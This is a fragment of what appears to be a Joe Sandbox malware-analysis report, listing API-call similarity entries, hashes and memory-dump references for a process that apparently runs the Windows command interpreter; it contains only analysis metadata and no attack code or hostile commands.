• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1532185241-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1c6a72294256c0d412322bc2bdf676a70003fefc2a48fff7776376e553141a5d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0341D432A147528BE754AB21DC6567FFAA1FF88B80F895535EB0A47785CF3CE8418710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f2ad0e1288994c78b38136c1c72dc95c389cf76207dbd40098ee7b0582e7d934
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B417B32A087428BE724AF11AC6027FF661FF94B84F985539DB0A47795DF2CE8408760
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA77A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA7AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA80E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA850
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2240656346-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memmovewcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3879766669-1994241859
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$memset$FullNamePath_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 145292299-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d66686ae5a21979d7577c1d14ef1b8f5d3dd661201d77368c390b96c4363317b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ce6951b8756998e6d7503284e55a75f1bcc4e65e81974ab9d0283a6a8f96417d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d66686ae5a21979d7577c1d14ef1b8f5d3dd661201d77368c390b96c4363317b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64218232709BC289EB31AF25DDA03EAA7A0FF49788F444134CA4D4BA99EF3CD1458710
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: fprintf
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 383729395-2781220306
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: KERNEL32.DLL$SetThreadUILanguage
• API String ID: 1646373207-2530943252
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4019809305-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE11DC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE1277
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1135967885-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1a8a2c775685e02cf1b2bfab1f3375190b1ad7c956f01dc94337fd03ea84a7f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8471C775A0874286D760AF15AC606BBF6E4FFA9798FD04235C94D83B94DF3CA4918B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED97D0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED98D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b47ce2809022f3e4184438290ed4214e1da36f9068b7e5ef6b65b67e52e09f9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8418E26A09B5281EA00FB16DC6503BA3A4FF84BD0F948231DA5E477E6DF39E856C350
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: _wcsnicmp
• String ID: /-Y
• API String ID: 1886669725-4274875248
• Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
• Instruction ID: 702dd6039b464f2e69e34c71de8ebe35fefd22f9f6d86ed595bf5c714085f997
• Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
• Instruction Fuzzy Hash: 2E21816AE0876581EB10AB42AD6117BF6A1BF54FC0F949131DE880B794DF3CE482D720
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: Module$FileHandleName
• String ID: P<dwj`
• API String ID: 4146042529-4006019111
• Opcode ID: 9888b8bcc5f4094d9b922c09ff083265bc4cf221ca7ae41e50f70850f082f57d
• Instruction ID: 9940d995d76de3a5bdfe1e774157f3a46e01ac35a91592b93d6e9298b9f807e0
• Opcode Fuzzy Hash: 9888b8bcc5f4094d9b922c09ff083265bc4cf221ca7ae41e50f70850f082f57d
• Instruction Fuzzy Hash: 9D219F62A1878696FB716B11AC203BBE790BF59BE4FCC5231DB5E066C5EF2DD4018620